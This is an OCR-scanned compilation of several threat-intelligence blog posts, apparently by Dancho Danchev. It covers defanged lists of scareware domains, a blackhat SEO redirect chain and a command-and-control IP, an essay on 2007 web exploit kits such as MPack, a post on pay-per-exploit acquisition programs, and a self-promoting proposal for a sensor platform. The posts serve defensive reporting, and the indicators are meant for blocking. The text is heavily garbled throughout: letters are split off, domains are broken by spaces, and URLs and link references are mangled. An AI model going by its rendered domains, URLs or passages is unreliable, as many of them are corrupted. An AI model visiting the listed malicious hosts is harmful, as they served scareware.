hxxp://a ntivirus-win-system7.com 

hxxp://a ntivirus-for-pc-8.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://perform-anti virus-scan-8.com 

hxxp://perform-anti virus-test-8.com 



hxxp://ru n-antivirusscan8.com 
hxxp://ru nantivirusscan8.com 
hxxp://ru n-virus-scanner8.com 
hxxp://wi ndowsantivirusserver8.com 
hxxp://perform-anti virus-test-9.com 
hxxp://perform-vi rus-scan9.com 
hxxp ://antispywa reinfo9.com 
hxxp://ru n-virus-scanner9.com 
hxxp ://ru n-virusscanner9.com 
hxxp ://antispywa re06scan.com 
hxxp ://antispywa reinfo9.com 
hxxp://antivirus-for-pc-2.com 
hxxp ://anti virus-for-pc-4.com 
hxxp ://anti virus-for-pc-6.com 
hxxp ://anti virus-for-pc-8.com 
hxxp ://anti viruspro8scan.com 
hxxp ://extra-anti virus-scanl.com 
hxxp ://extra-security-scan bl.com 
hxxp ://run-anti virusscanO.com 
hxxp ://run-anti virusscanl.com 



hxxp://ru n-antivirusscan3.com 
hxxp://ru n-antivirusscan6.com 
hxxp://ru n-antivirusscan8.com 
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hxxp://ru nantivirusscanO.com 

hxxp://ru nantivirusscan3.com 

hxxp://ru nantivirusscan4.com 

hxxp://ru nantivirusscan9.com 

hxxp://secu repro-antivirusl.com 

hxxp://su per-scanner-2004.com 

hxxp://top-rateanri virusO.com 

hxxp://topanti malware-scan ner7.com 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - A Diversified Portfolio of Fake 
Security Software Spotted in the Wild (2018-10-22 
13:40) It's 2010 and I've recently stumbled upon yet 
another malicious and fraudulent domain portfolio serving a 
variety of 

fake security software also known as scareware potentially 
exposing hundreds of thousands of users to a variety of 



fake security software with the cybercriminals behind the 
campaign potentially earning fraudulent revenue largely 

relying on the utilization of an affiliate-network based type 
of revenue-sharing scheme. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://50vi rus-scanner.com 

hxxp://700vi rus-scanner.com 

hxxp://anti virus-test66.com 

hxxp://anti virus200scanner.com 

hxxp://anti virus600scanner.com 

hxxp://anti virus800scanner.com 

hxxp://anti virus900scanner.com 

hxxp://av-scan ner200.com 

hxxp://av-scan ner300.com 

hxxp://av-scan ner400.com 

hxxp://av-scan ner500.com 

hxxp://i netproscan031.com 

hxxp ://i nternet-scan020.com 

hxxp://novi rus-scanOO.com 

hxxp ://stopvi rus-scanll.com 



hxxp://stopvi rus-scanl3.com 
hxxp://stopvi rus-scanl6.com 
hxxp://stopvi rus-scan33.com 
hxxp://vi rus66scanner.com 
hxxp://vi rus77scanner.com 
hxxp://vi rus88scanner.com 
hxxp://anti virus-scan 200.com 
hxxp://antispy-scan200.com 
hxxp://av-scan ner200.com 
hxxp://av-scan ner300.com 
hxxp://anti virus-scan400.com 
hxxp://antispy-scan400.com 
hxxp://av-scanner400.com 
hxxp://av-scan ner500.com 
hxxp://anti virus-scan600.com 
hxxp://antispy-scan600.com 
hxxp://anti virus-scan 700.com 
hxxp://antispy-scan700.com 
hxxp://av-scan ner700.com 
hxxp://antispy-scan800.com 



hxxp://a ntivirus-scan900.com 

hxxp://novi rus-scan00.com 

hxxp://stop-vi rus-010.com 

hxxp://spy warescan010.com 

Related malicious domains known to have 
participated in the campaign: 

hxxp://a ntispywarehelp010.com 
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hxxp://i nternet-scan020.com 
hxxp://i nternet-scanner020.com 
hxxp://i nsight-scan20.com 
hxxp://i nternet-scanner030.com 
hxxp://stop-vi rus-040.com 
hxxp://i nternet-scan040.com 
hxxp://i nsight-scan40.com 
hxxp://i nternet-scan050.com 
hxxp://i nternet-scanner050.com 
hxxp://i nsight-scan60.com 
hxxp://stop-vi rus-070.com 
hxxp://i nternet-scan070.com 



hxxp ://i nternet-scanner070.com 
hxxp://i nsight-scan80.com 
hxxp://stop-vi rus-090.com 
hxxp ://i nternet-scan090.com 
hxxp ://i nternet-scanner090.com 
hxxp ://i nsight-scan90.com 
hxxp ://antispywa rehelpkO.com 
hxxp ://i netproscan001.com 
hxxp ://novi rus-scan01.com 
hxxp://spyware-stop01.com 
hxxp ://anti virus-inet01.com 
hxxp ://stopvi rus-scanll.com 
hxxp ://i netproscan031.com 
hxxp ://novi rus-scan31.com 
hxxp ://anti virus-inet31.com 
hxxp ://novi rus-scan41.com 
hxxp ://anti virus-inet41.com 
hxxp ://anti virus-inet51.com 
hxxp ://i netproscan061.com 
hxxp ://novi rus-scan61.com 



Related malicious domains known to have 
participated in the campaign: 

hxxp://i netproscan081.com 

hxxp://novi rus-scan81.com 

hxxp://i netproscan091.com 

hxxp://spyware-stopbl.com 

hxxp://spy ware-stopml.com 

hxxp://spyware-stopnl.com 

hxxp://spyware-stopzl.com 

hxxp://a ntispywarehelp002.com 

hxxp://a ntispywarehelp022.com 

hxxp://novi rus-scan22.com 

hxxp://a ntispywarehelpk2.com 

hxxp://i nsight-scanner2.com 

hxxp://spywarescan013.com 

hxxp://stopvi rus-scanl3.com 

hxxp://novi rus-scan33.com 

hxxp://stopvi rus-scan33.com 
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hxxp://a ntispywarehelp004.com 



hxxp://a ntispywarehelpk4.com 

hxxp://spywarescan015.com 

hxxp://novi rus-scan55.com 

hxxp://i nsight-scanner5.com 

hxxp://stopvi rus-scanl6.com 

hxxp://stopvi rus-scan66.com 

hxxp://a ntispywarehelpk6.com 

hxxp://spy warescan017.com 

hxxp://i nsight-scanner7.com 

hxxp://a ntispywarehelp008.com 

hxxp://spy warescan018.com 

hxxp://stopvi rus-scanl8.com 

hxxp://novi rus-scan88.com 

hxxp://stopvi rus-scan88.com 

hxxp://a ntivirus-test88.com 

hxxp://a ntispywarehelpk8.com 

hxxp://i nsight-scanner8.com 

hxxp://i nsight-scanner9.com 

Related malicious domains known to have 
participated in the campaign: 



hxxp://10scana ntispyware.com 
hxxp://2 Oscanantispyware.com 
hxxp://30scana ntispyware.com 
hxxp://60scana ntispyware.com 
hxxp://80scana ntispyware.com 
hxxp://2 scanantispyware.com 
hxxp ://3scanantispy ware, com 
hxxp ://5scanantispy ware.com 
hxxp ://7scanantispy ware.com 
hxxp ://8scanantispy ware, com 
hxxp ://spy ware200scan.com 
hxxp://spyware500scan.com 
hxxp://spyware800scan.com 
hxxp://spyware880scan.com 
hxxp ://50vi rus-scanner.com 
hxxp ://90vi rus-scanner.com 
hxxp ://anti virus900scanner.com 
hxxp ://anti viruslOscanner.com 
hxxp ://vi rus77scanner.com 
hxxp ://vi rus88scanner.com 



hxxp://netOO lantivirus.com 
hxxp://netO llantivirus.com 
hxxp://netl llantivirus.com 
hxxp://net02 lantivirus.com 
hxxp ://net-02anti virus.com 
hxxp://net2 2 2antivirus.com 
hxxp ://net-04anti virus.com 
hxxp ://net-05anti virus.com 
hxxp ://net-07anti virus.com 
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We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Massive Blackhat SEO Campaign 
Spotted in the Wild Serves Scareware (2018-10-22 
14:05) 

It's 2010 and I've recently stumbled upon a currently active 
and circulating malicious and fraudulent blackhat SEO 

campaign successfully enticing hundreds of thousands 
globally into interacting with a multi-tude of rogue and 

malicious software also known as scareware. 



In this post I'll profile the campaign discuss in-depth the 
tactics techniques and procedures of the cybercrimi¬ 
nals behind it and provide actionable intelligence on the 
infrastructure behind it. 

Related malicious domains known to have 
participated in the campaign: 

hxxp://ozeqiod.cn?uid = 213 - redirector - 64.86.25.201 - 
hxxp://bexwuq.cn 

Sample URL redirection chain: 

hxxp://ymarketcoms.cn/?pid = 123 

Related malicious domains known to have responded 
to the same malicious C &C server IPs 
(64.86.25.201): 

hxxp://bombasl01.com 

hxxp://trhtrtrbtrtbtb.com 

hxxp://opensearch-zone.com 

hxxp://imaera.cn 

hxxp://ariexa.cn 

hxxp://ozeqiod.cn 

hxxp://ariysle.cn 

hxxp://ajegif.cn 

hxxp://adiyki.cn 



hxxp://acaisek.cn 
h xx p ://y va m u er. c n 
hxxp://protecti nstructor.cn 
hxxp://bl anshinblansh.net 
hxxp://kosti nporest.net 

Related malicious domains known to have 
participated in the campaign: 

hxxp://azikyxa.cn 

hxxp://befaqki.cn 

hxxp://ataini.cn 

hxxp://atoycri.cn 

hxxp://bimpuj.cn 

hxxp://bekajop.cn 

hxxp://bexwuq.cn 

hxxp://azy woax.cn 

hxxp://azaijy.cn 

We'll continue monitoring the campaign and post updates 
as soon as new developments take place. 
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Historical OSINT - Malicious Economies of Scale - The 
Emergence of Efficient Platforms for Exploitation - 



2007 (2018-10-22 16:23) 

Dear blog readers it's been several years since I last posted 
a quality update following my [1]2010 disappearance. As 

it's been quite a significant period of time since I last posted 
a quality update I feel it's about time I post an quality 

update by detailing the Web Malware Exploitation market 
segment circa 2007 prior to my visit to the GCHQ as an 

independent contractor with the [2]Honeynet Project. 

In this post I'll discuss the rise of Web malware exploitation 
kits circa 2007 and offer in-depth discussion on 

the current and emerging tactics techniques and procedures 
(TTPs) of the cybercriminals behind it. With cyber¬ 
criminals continuing to actively rely on the exploitation of 
patched and outdated vulnerabilities and with end users 

continuing to actively utilize unpatched and outdated third- 
party software it shouldn't be surprising that today's 

botnets remain relatively easy to generate and orchestrate 
for the purpose of committing financial fraud. 

Malicious Economies of Scale literally means utilizing attack 
techniques and exploitation approaches to effi¬ 
ciently, yet cost and time effectively, infect or abuse as 
many victims as possible, in a combination with an added 

layer of improved metrics on the success of the campaigns. 
What are the most popular web exploitation kits that 



malicious parties use to achieve this? Which are the most 
popular vulnerabilities used in the majority of the kits? 

What are the most popular techniques for embedding 
malware? This white paper will outline this efficiency- 
centered 

attack model, and will cover web application vulnerabilities, 
client-side vulnerabilities, malvertising and black hat 

SEO (search engine optimization). 

An overview of the threats posed by rising number of 
malware embedded sites, with a discussion of the ex¬ 
ploitation techniques and kits used, as well as detailed 
summaries of all the high-profile such attacks during 2007. 

01. Reaching the Efficiency Scale Through a Diverse 
Set of Exploited Vulnerabilities 

2007 was the year in which client-side vulnerabilities 
significantly replaced server-side ones as the preferred 

choice of malicious attackers on their way to achieve the 
highest possible attack success rate, while keeping their in¬ 
vestment in terms of know-how and personal efforts to the 
minimum. Among the most successful such attacks during 

2007 was Storm Worm, the perfect example that the use of 
outdated and already patched vulnerabilities can result 

in aggregating the world's largest botnet according to 
industry and independent researchers' estimates. By itself, 
this 



attack technique is in direct contradiction with the common 
wisdom that zero day vulnerabilities are more dangerous 

than already patched ones, however, the gang behind Storm 
Worm quickly envisioned this biased statement as false, 

and by standardizing the exploitation process with the help 
of outdated vulnerabilities achieved an enormous success. 

Years ago, whenever, a vulnerability was found and exploit 
code released in the wild, malicious attackers used 

to quickly released a do-it-yourself exploitation kit to take 
advantage of a single exploit only. Nowadays, that's no 

longer the case, since by using a single exploit whether an 
outdated, or zero day one, they're significantly limiting the 

probability for a successful attack, and therefore the more 
diverse and served on-the-fly is the set of exploits used in 

an attack, the higher would the success rate be. 

What was even more interesting to monitor during 2007, 
was the rise of high-profile sites serving malware, 

and the decline of malware coming from bogus ones. From 

the [3]Massive Embedded Malware Attack at a large 

Italian ISP to the Bank of India, the Syrian Embassy 
in the U.K, the U.S Consulate in St. Petersburg, 
China's CSIRT, 

Possibility Media's entire portfolio of E-zines, to the 

French government's site related to Lybia, these trusted web 

sites were all found to serve malware though an embedded 
link pointing back to the attacker's malicious server. Let's 



clarify what malicious economies of scale means, and how 
do they do it. 

02. What is malicious economies of scale, and how is 
it achieved? 
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Malicious economies of scale is a term I coined in 2007 to 
summarize the ongoing trend of efficiently attacking online 
users, by standardizing the exploitation process, and by 
doing so, not just lowering the entry barriers into 

the process of exploiting a large number of users, but also, 
maintaining a rather static success rate of infections. 

Malicious economies of scale is the efficient way by which a 
large number of end users get infected, or have their 

online abused, with the malicious parties maintaining a 
static attack model. It's perhaps more important to also 

describe how is the process achieved at the first place? The 
first strategy applied has to do with common sense in 

respect to the most popular software applications present at 
the end user's end, and the first touch-point in this case 

would be the end user's Internet browser. 

Having its version easily detected and exploit served, one 
that's directly matching the vulnerable version, is 

among the web exploitation kits main functionalities. Let's 
continue with the second strategy, namely to increase the 

probability of success. As I've already pointed out, do-it- 
yourself single vulnerability exploiting tools matured into 



web exploitation malware kits, now backed up with a diverse 
set of exploits targeting different client-side applications, 

which in this case is the process of increasing the probability 
of successful infection. The third strategy has to do 

with attracting the traffic to the malicious server, that as I've 
already discussed is already automatically set to 

anticipate the upcoming flood of users and serve the 
malware through exploiting client-side software 
vulnerabilities 

on their end. This is mainly done through exploiting remote 
file inclusion vulnerabilities within the high-profile 

targets, or through remotely exploitable web application 
vulnerabilities to basically embed a single line of code, 

or an obfuscated javascript that when deobfuscated will load 
the malicious URL in between loading the legitimate site. 

Popular Malware Embedded Attack Tactics 

This part of the article will briefly describe some of the most 
common attack tactics malicious parties use to 

embed links to their malicious servers on either high-profile 
sites, or any other site with a high pagerank, something 

they've started measuring as of recently according to threat 
intell assessment on an automated system to embed 

links based on a site's popularity. 

• The “pull" Approach - Blackhat SEO, Harnessing 
the Trusted Audience of a Hacked Site 



In this tactic, malicious parties entirely rely on the end users 
to reach their malicious server, compared to the second 

tactic of "pushing" the malicious links to them. This is 
primarily accomplished through the use of Blackhat SEO 

tools generating junk content with the idea to successfully 
attract search engine traffic for popular queries, thus 

infecting anyone who visits the site, who often appear within 
the first twenty search results. The second "pull" 

approach such tactic is harnessing the already established 
trust of a site such as major news portal for instance, 

and by embedding a link to automatically load on the portal, 
have the users actually "pull" the malware for themselves 

• The “push" Approach - Here's Your Malware 
Embedded Link 

The "push" approach's success relies in its simple logic, with 
end users still worrying about downloading or clicking on 

email attachments given the overall lack of understanding 
on how to protect from sites serving malware, it's logical 

to consider that basically sending a link which once visited 
will automatically infect the visitor though exploiting a 

client-side vulnerability, actually works. Storm Worm is the 
perfect example, and to demonstrate what malicious 

economies of scale means once again, it's worth mentioning 
Storm's approach of having an already infected host 

act as an infection vector itself, compared to its authors 
having to register multiple domains and change them 



periodically. The result is malware embedded links 
exploiting client-side vulnerabilities in the form of an IP 
address, 

in this case an already infected host that's now aiming to 
infect another one 
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• Automatically Exploiting Web Application 
Vulnerabilities - Mass SQL Injection Attacks 

As I've already pointed out, malicious parties are not just 
efficiently scanning for remotely exploitable web application 

vulnerabilities or looking for ways to remotely include files 
on any random host, they've started putting efforts into 

analyzing the page rank, and overall popularity of a site 
they could exploit. This prioritizing of the sites to be used for 

a "pull" tactic is aiming to achieve the highest possible 
success rate by targeting a high-trafficked site, where even 

though the attack can be detected, the "window of 
opportunity" while the users were also accessing the 
malicious 

server could be far more beneficial than having a permanent 
malware link on a less popular site for an indefinite 

period of time. 

• Malicious Advertisements - Malvertising 

Among the most popular traffic acquisition tactics nowadays 
remain the active utilization of legitimate Web properties 



for the purpose of socially engineering an ad network 
provider into featuring a specific malware-serving 
advertising 

at the targeted Web site including active Web site 
compromise for the purpose of injecting rogue and malicious 
ads 

on the targeted host. 

Related posts: 

• [4]Historical OSINT - Malicious Malvertising Campaign, 
Spotted at FoxNews, Serves Scareware 

• [5]Cybercriminals Launch Malicious Malvertising 
Campaign, Thousands of Users Affected 

• [6]Managed SWF Injection Cybercrime-friendly Service 
Fuels Growth Within the Malvertising Market Segment 

• Buying Access to Hacked Cpanels or Web Servers 

Thanks to a vibrant DIY (do-it-yourself) Web malware 
exploitation kit culture including the active utilization of 
various 

DIY Web site exploitation and malware-generating 
cybercriminals continue actively utilizing stolen and 
compromised 

accounting data for the purpose of injecting malicious 
scripts on the targeted host further compromising the confi¬ 
dentiality availability and integrity of the targeted host. 

• Harvesting accounting data from malware infected 
hosts 



Having an administrator access to a domains portfolio, or 
any type of access though a web application backdoor or 

direct FTP/SSH, has reached its commercial level a long time 
ago. In fact, differentiated pricing applies in this case, 

on the basis of a site's page rank, whereas I've stumbled 
upon great examples of "underground goods liquidity" as 

a process, where access to a huge domains portfolio though 
a hacked Cpanels is being offered for cents with the 

seller's main concern that cents are better than nothing, 
nothing in the sense that she may loose access to the 
Cpanel 

before its being sold and thus ends up with nothing. Now, 
let's discuss the most popular malware exploitation kits 

currently in the wild. 

The Most Popular Web Malware Exploitation Kits 

Going into detail about the most common vulnerabilities 
used in the multitude of web malware exploitation 

kits could be irrelevant from the perspective of their current 
state of "modularity", that is, once the default installa¬ 
tion of the kit contains a rather modest set of exploits, the 
possibility to add new exploits to be used has long reached 

the point'n'click stage. Even worse, localizing the kits to 
different languages further contributes to their easy of use 

and acceptance on a large scale, just as is their open source 
nature making it easy for coders to use a successful kit's 



modules as a foundation for a new one - something's that's 
happening already, namely the different between a 

copycat kit and an original coded from scratch one. Among 
the most popular malware kits remain : 

123 

• A Brief Overview of MPack, IcePack, Zunker, 
Advanced Pack and Fire Pack 

During 2007, Mpack emerged as the most popular malware 
exploitation kit. Originally available for purchase, by 

the time copies of the kit started leaking out, anyone from a 
script kiddie to a pragmatic attacker have obtained 

copy of it. Mpack's main strength is that of its well 
configured default installation, which in a combination with 
a 

rather modest, but then again, modular set of exploits 
included, as well as its point'n'click level of sophistication 

automatically turned it into the default malware kit. Mpack's 
malware kit has been widely used on nearly all of the 

high-profile malware embedded attacks during 2007, 
however, its popularity resulted in way too much industry 

attention towards its workings, and therefore, malicious 
parties starting coming up with new kits, still using Mpack 

as the foundation at least from a theoretical perspective. 

The list is endless, the Nuclear Malware kit, Metaphisher, old 
version of the WebAttacker and the Rootlauncher kit, 



with the latest and most advanced innovation named the 
Random JS Exploitation Kit. Compared to the previous one, 

this one is going a step beyond the usual centralized 
malicious server. 

With malicious parties now interested in controlling as much 
infected hosts with as little effort as possible, 

client-side vulnerabilities will continue to be largely abused 
in an efficient way thought web malware exploitation 

kits in 2008. The events that took place during 2007, clearly 
demonstrate the pragmatic attack approaches malicious 

parties started applying, namely realizing that an outdated 
but unpatched on a large scale vulnerability is just as 

valuable as a zero day one. 

1. https://ddanchev.blo as pot.com/2Q18/10/dancho- 
danchevs-2010-disa p pearance.html 

2. https://speakerdeck.com/ddanchev/ces a-h p-cvberintel- 
dancho 

3. https://ddanchev.blo as pot.com/2017/Q5/historical-osint- 
mside-2QQ7-2GQ9.html 

4. https://ddanchev.blo as pot.com/2Q17/01/historical-osint- 
malicious-malvertisin a .html 

5. https://ddanchev.blo as pot.com/2016/Q4/cvbercriminals- 
launch-malicious.html 

6. https://ddanchev.blo as pot.com/2016/Q8/mana a ed-swf- 
ini ection-cvbercrime.html 


























124 


zerSffliurTT 

Pay-Per-Exploit Acquisition Vulnerability Programs - 
Pros and cons? (2018-10-22 17:47) 

As [l]ZERODIUM starts paying premium rewards to security 
researchers to acquire their previously unreported zero- 

day exploits affecting multiple operating systems software 
and/or devices a logical question emerges in the context of 

the program's usefulness the potential benefits including 
potential vulnerabilities within the actual acquisition 
process 

- how would the program undermine the security industry 
and what would be the eventual outcome for the security 

researcher in terms of 

[2]fueling growth in the cyber warfare market 
segment 

? 

In this post I'll discuss the m 
arket segment for p 
ay-per-exploit 
acquisition progr 


ams 



and discuss in-depth the current exploit- 

acquisition methodology utilized by different vendors 

and provide in-depth discussion on v 

arious over-the-counter 

acquisition methodologies 

applied by m 

alicious 

att 

ackers on their w 
ay to monetize 
access to m 
alw 

are-infected hosts while compromising the confidenti 

ality 

av 

ail 

ability 

and integrity of the t 
argeted 
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host including 
an 

active discussion on the ongoing 
and potenti 
al we 
aponiz 

ation of zero d 
ay vulner 

abilities int the context of tod 

ay's cyber w 

arf 

are world. 

Having greatly realized the potential of acquiring zero day 
vulnerabilities for the purpose of actively exploiting end 

users malicious actors have long been aware of the [3]over- 

the-counter acquisition market model 

further enhancing their capabilities when launching 
malicious campaigns. Among the most widely [4]spread 
myth 

about zero day vulnerabilities is the fact that 

[5]zero day vulnerabilities arethe primary growth 
factor of the cybercrime ecosystem 



further resulting in a multi-tude of malicious activity 
targeting end users. 

With vendors continuing to est 

ablish the found 

ations for 

active vulner 

a bility and exploit 

acquisition progr 

ams third-p 

arty vendors 

and rese 

arch org 

aniz 

ations continue successfully disintermedi 
ating the vendor's m 
ajor vulner 
ability 
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and exploit 
acquisition progr 



ams successfully resulting in the I 

aunch 

and est 

ablishment of third-p 
arty services 

and products further popul 

ating the security-industry with rel 

ated products 

and services potenti 

ally 

acquiring "know-how" 
and relev 
ant vulner 
ability 

and exploit inform 
ation from m 
ajor vendors further I 
aunching rel 
ated comp 


ames 



and services potenti 
ally empowering third-p 
arty rese 
archers vendors 
and individu 
als including n 
ation-st 
ate 

actors with potenti 

al we 

aponiz 

ation c 

ap 
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abilities potenti 
ally le 

ading to successful t 
arget- 

acquisition pr 


actices on beh 



alf of third-p 
arty rese 
archers 
and individu 
als. 

Becoming 
a t 

arget in the widespread 
context of third-p 
arty vendors 
and rese 

archers might not be the wisest 
appro 

ach when undermining potenti 

aI rese 

arch 

and in-house rese 
arch 

and benchm 
arking 



activities in terms of e v alu 


ating 

and responding to vulner 
abilities 

and exploits. Vendors looking for w 
ays to efficiently improve the over 
all security 
and product perform 

ance in terms of security should consider b 
asic intern 
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al benchm 
arking pr 

actices and should also consider a possible incentive-based 
type of vulnerability and exploit reward-type of 

revenue-sharing program potentially rewarding company 
employees and researchers with the necessary tools and 

incentives to find and discover and report security 
vulnerabilities and exploits. 

Something else worth pointing out in terms of vulnerability 
research and exploit discovery is a process which can be 



best described as the life-cycle of a zero day vulnerability 
and exploit which can be best described as a long-run 

process utilized by malicious and fraudulent actors 
successfully utilizing client-side exploits for the purpose of 

successfully dropping malicious software on the hosts of the 
targeted victims which often rely on outdated and 

patched vulnerabilities and the overall misunderstanding 
that zero day vulnerabilities and exploits are the primary 



growth factor of the security-industry and will often rely on 
the fact that end users and enterprises are often 

unaware of the basic fact that cybercriminals often rely on 
outdated and patched vulnerabilities successfully 

targeting thousands of users globally on a daily basis. 

What used to be a market-segment dominated by DIY (do-it- 
yourself) exploit and malware-generating tools is 

today's modern market-segment dominated by Web 
malware-exploitation kits successfully affecting thousands 
of 

users globally on a daily basis. In terms of Web-malware 
exploitation kits among the most common misconceptions 

regarding the utilization of such type of kits is the fact that 
the cybercriminals behind it rely on newly discovered 

exploits and vulnerabilities which in fact rely on 

[6]outdated and already patched security 
vulnerabilities and 

exploits for the purposes of successfully enticing thousands 
of users globally into falling victim into 

social-engineering driven malicious and fraudulent 
campaigns. 

Despite the evident usefulness from a malicious actor's 
point of view when launching malicious campaigns 
malicious 

actors continue utilizing outdated vulnerabilities for the 
purpose of launching malicious campaigns further utilizing 



a 


multi-tude of social engineering attack vectors to enhance 
the usefulness of the exploitation vector. Another crucial 

aspect of the pay-per-exploit acquisition vulnerability model 
is, the reliance on outdated and unpatchted 

vulnerabilities for the purpose of launching malicious 
campaigns further relying on the basic fact that on the 

majority of occasions end users fail to successfully update 
their third-party applications often exposing themselves 

to a variety of successful malicious campaigns utilizing 
outdated and unpatched vulnerabilities. 

We expect to continue observing an increase in the pay-per- 
exploit acquisition model with, related acquisition 

model participants continuing to acquire vulnerabilities 
further fueling growth into the market segment. We expect 

that malicious actors will adequately respond through over- 
the-counter acquisition models including the utilization 

of outdated and unpatched vulnerabilities. End users are 
advised to continue ensuring that their third-party 

applications are updated to build a general security 
awareness and to ensure that they're running a fully 
patched 

antivirus solution. 

Consider going through the following related posts: 

[7]Researchers spot new Web malware exploitation kit 



[8] Web malware exploitation kits updated with new Java 
exploit 

[9] Which are the most commonly observed Web exploits in 
the wild? 

[lOJReport: Patched vulnerabilities remain prime 
exploitation vector 

[HJReport: malicious PDF files becoming the attack vector 
of choice 

[12]Malvertising campaigns at multiple ad networks lead to 
Black Hole Exploit Kit 

[13J56 percent of enterprise users using vulnerable Adobe 
Reader plugins 

[14] Report: third party programs rather than Microsoft 
programs responsible for most vulnerabilities 

[15] Report: malicious PDF files becoming the attack vector 
of choice 
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[16] Malvertising campaigns at multiple ad networks lead to 
Black Hole Exploit Kit 

[17J56 percent of enterprise users using vulnerable Adobe 
Reader plugins 

[18] Report: third party programs rather than Microsoft 
programs responsible for most vulnerabilities 

[19] Report: 64 % of all Microsoft vulnerabilities for 2009 
mitigated by Least Privilege accounts 



[20]Secunia: popular security suites failing to block exploits 

[21 ]37 percent of users browsing the Web with insecure Java 
versions 

[22] Which are the most commonly observed Web exploits in 
the wild? 

[23] Report: Malicious PDF files comprised 80 percent of all 
exploits for 2009 

[24] Secunia: Average insecure program per PC rate remains 
high 
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2. https://www.webroot.com/blo a /2Q13/12/27/cvbercrime- 
trends-2Q13-vear-review/ 

3. http://www.zdnet.com/article/black-market-for-zero-da v- 
vu I nerabi titi es-sti I [-thrivin g/ 

4. https://www.zdnet.com/article/seven-mvths-about-zero- 
dav-vulnerabiliities-debunked 

5. https://www.zdnet.com/article/report-patched- 
vulnerabifin ies-remain-prime-exploitation-vector/ 

6 . 

https://www.zdnet.com/article/a-patched-browser-false- 
feelin a -of-securitv-or-a-securitv-uto pia-that-actu 
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7. https://www.zdnet.com/article/researchers-spot-new-web- 
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11. https://www.zdnet.com/article/report-manciQus-pdf-files- 
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13. https://www.zdnet.com/article/56-percent-of-enterprise- 
users-usin a -vulnerable-adobe-reader-plu a ins/ 

14. https://www.zdnet.com/article/report-third-part v- 
pro a rams-rather-than-microsoft-pro a rams-responsible-for 

-most-vulnerabilities/ 
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18. https://www.zdnet.com/article/report-third-part v- 
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Cyber Security Project Investment Proposal - DIA 
Needipedia - Fight Cybercrime and Cyber Jihad With 

Sensors - Grab Your Copy Today! (2018-12-16 13:52) 

Dear blog readers, I decided to share with everyone a 
currently pending project investment proposal regarding the 

upcoming launch of a proprietary Technical Collection 
analysis platform with the project proposal draft available 
on 

request part of [lJDIA's Needipedia Project Proposal 
Investment draft or eventually through the [2]Smith 
Richardson Foundation. 

In case you're interested in working with me for the purpose 
of implementing the project solution including a 

possible investment proposal on your behalf - that also 
includes a possible VC or an angel investor introduction - I 

can be reached at dancho.danchev@hush.com 

Looking forward to receiving your comments questions 
feedback and general remarks including possible in¬ 
vestment proposal requests. Happy Holidays! 

Enjoy! 

01. Executive summary 

The Obmonix platform aims to build the world's most 
versatile and comprehensive sensor network for 
intercepting 



cybercrime and cyber jihad activity on a global scale 
successfully positioning the project as a leading in-house 
built 

provider for actionable intelligence within the Intelligence 
Community. 

02. What are you trying to do? 

The Obmonix platform aims to build the world's most 
versatile and comprehensive sensor network for 
intercepting 
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cybercrime and cyber jihad activity successfully positioning 
the platform as a leading in-house provider of actionable 

intelligence within the Intelligence Community. 

03. How is it currently done? 

Largely relying on a selected set of outsourced intelligence¬ 
gathering providers the Intelligence Community overall 

reliance on commercial intelligence gathering providers has 
successfully positioned the Intelligence Community with 

a limited sight in terms of pro-active and systematic 
response to cybercrime and cyber jihad events globally. 

04. What's new? 

Largely relying on the utilization of multiple interception 
vectors including hybrid-based type of sensor networks the 


Intelligence Community is successfully positioned to 
successfully intercept and proactively respond to a growing 
set 

of cybercrime and cyber jihad events globally. 

05. Who cares? 

The Intelligence Community largely positioned to take 
advantage of a growing set of technologies for the purpose 

of pro-actively responding to a growing set of cybercrime 
and cyber jihad events globally is ultimately empowered 

to take advantage of modern hybrid-based type of sensor 
networks for the purpose of successfully intercepting and 

responding to a growing set of cybercrime and cyber jihad 
events globally. 

06. What are the risks? 

Successfully positioning the provider as a leading provider 
for actionable intelligence in terms of cybercrime and 

cyber jihad events globally within the Intelligence 
Community will successfully position the Obmonix platform 
and 

its operator as a leading provider of actionable intelligence 
within the Intelligence Community. 

Transmittal Letter 

My name is Dancho Danchev I'm an internationally 
recognized cybercrime researcher security blogger and 



threat intelligence analyst currently maintaining some of 
the industry's leading threat intelligence gathering 

information-sharing resources having successfully 
contributed to the overall demise of cybercrime 
internationally 

having successfully monitored analyzed and processed 
some of the industry's major nation-state and malicious 
actor 

type of malicious campaigns over the last decade leading 
me to a successful career as a cybercrime researcher 

security blogger and threat intelligence analyst leading me 
to a successful launch of my newly launched startup 

named Disruptve Individuals and the Obmonix - Cybercrime 
and Cyber Jihad Fighting Sensor Network. 
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Having successfully pioneered my own methodology for 
processing threat intelligence data including active 

dissemination of threat intelligence data to a variety of 
sources including an in-depth understanding of the Intel¬ 
ligence Cycle I'm certain that based on my experience the 
time has come to establish a professional and working 

relationship with a government-private sector enterprise 
leading me to a successful project proposal within the 

Intelligence Community and the security industry. 

My initial goal for submitting a project proposal is to ensure 
that the Intelligence Community remains on the 



top of its game and that the United States remains ahead of 
adversaries looking to profit from its economic might 

including the successful compromise of its infrastructure 
potentially targeting the life's and well-being of its citizens 

globally. 

Largely relying on a set of industry-leading contacts my 
initial idea is to ensure that the Intelligence Commu¬ 
nity remains actively empowered with the world's largest 
and most comprehensive platform for monitoring profiling 

and proactively responding to malicious nation-state 
malicious actors type of cybercrime and cyber-jihad activity 

globally through the successful establishing of a 
government-private sector type of partnership leading me 
to a 

successful launch of my own company leading me to a 
successful project-based type of project proposal. 

Having actively contributed to the overall demise of 
cybercrime internationally through the last decade I'm 

certain that my expertise ambition and expertise in the field 
will successfully contribute to the Intelligence Commu¬ 
nity's overall mission including a currently active project 
within the Intelligence Community and the security 
industry. 

I sincerely hope that my project proposal will be eventually 
funded leading me to become an active partici- 



pant within the Intelligence Community with a currently 
active project within the Intelligence Community and the 

security-industry. 
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Company Overview 

The following brief will provide a detailed summary of the 
company overview including key success factors 

and a project taxonomy. 

Disruptive Individuals is a research-intensive data-driven 
company successfully establishing the world's largest 
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snapshot of malicious cybercrime activity for the purpose of 
offering the industry the world's most versatile portfolio of 
malicious cybercrime-driven services successfully 
positioning itself as the world's leading provider of real¬ 
time 

intelligence-driven services and product portfolio including 
cybercrime-research data malicious activity profiling 

services and custom-tailored intelligence assessments 
successfully positioning the company as the world's leading 

provider of cybercrime-data driven research-intensive 
intelligence data-driven company. 


Key Success Factors 


• the platform will be ultimately capable of establishing the 
